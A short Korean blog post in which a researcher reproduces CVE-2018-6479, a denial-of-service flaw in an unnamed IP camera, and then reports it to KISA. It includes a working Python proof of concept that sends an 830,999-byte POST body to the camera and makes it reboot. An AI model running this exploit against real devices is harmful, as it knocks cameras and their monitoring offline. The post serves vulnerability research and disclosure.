[ IP Camera Dos Attack (CVE-2018-6479) ]

한 동안 IP Camera분석을 못하고 있다가, 예전에 봐두었던 CVE를 재현해봤다.

뭐 재현이랄것도 없지만.

CVE Number는 2018-6479이며 올해 초에 등록된 CVE이다.

github : https://github.com/dreadlocked/netwave-dosvulnerability

Attack Vector는 네크워크이며

방대한 양의 POST 데이터를 요청할 때 서비스가 중단되는 공격(Denial of Service)이다.

---

※ 해당 글에는 CVE 재현에 사용되는 IP Camera 제품에 대해서 어떠한 정보도 제공하지 않았습니다.

[ PoC ]

import string
import httplib
import urllib2
 
host = "192.168.1.126"
port = 6611
payload ='A'*830999 # Dummy DATA
 
url = "/"
headers = { 
"Host": host+':'+str(port),
"Connection": "keep-alive",
"Content-Length": 830999,}
 
print "2018-09-28 KISA PoC"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,payload,headers)

 PoC코드는 간단하다.

"A"*830999개를 POST메소드를 이용해서 보내는 동작을 하며, 코드 실행 시 카메라가 재부팅 된다.

[ PoC 실행 ]

보는 것과 같이 코드 동작전에는 카메라 제어가 정상적으로 작동되었는데

코드 실행 후에는 카메라 서비스가 중단되는 것을 확인할 수 있다.

(글에는 담지 못했지만, 카메라는 재부팅되고 있었다.)

---

[ KISA 취약점 제보 ]

뭐 직접 찾은 취약점도 아니고, 굉장한 취약점은 아니지만 경험 삼아 제보해보기로 했다.

IP Camera 집중 신고기간이기도 하고..

취약점 제보는 완료했으며, 심사 중인 상태이다.